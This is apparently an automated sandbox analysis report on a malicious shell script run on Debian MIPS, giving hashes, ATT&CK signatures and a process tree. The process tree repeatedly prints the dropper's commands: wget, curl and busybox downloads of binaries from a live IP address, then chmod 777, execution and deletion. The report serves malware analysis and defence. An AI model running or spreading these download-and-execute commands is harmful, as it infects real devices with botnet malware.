Analysis
-
max time kernel
87s -
max time network
89s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
-
Size
10KB
-
MD5
d8b3cb4793886f8ba51c73bc3cadbaca
-
SHA1
2a4c460dad61345bdd09351812e2865159abe9dd
-
SHA256
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31
-
SHA512
dac5943a6be21fdaf966f6845585dedf0d97cbfa7743cd046fe3570f9ed3a292545364c7f491984555e1e5c5093f3ed46570d03629c6f6786b735a294788e013
-
SSDEEP
192:rmjDQXL2FkYrQo5MENdKVRKKmdNdKVR2kYrQoYjDQXLoN:UFkYrQo5MAKmbkYrQo6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:745
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:754
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:760
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:766
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:787
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:818
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:829
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:868
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:874
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:880
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:886
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:892
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:898
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:904
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:910
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:916
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:922
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:928
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:934
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:940
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:946
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:952
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:958
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:964
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:970
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:976
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:982
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:985
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:986
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:988
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:991
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97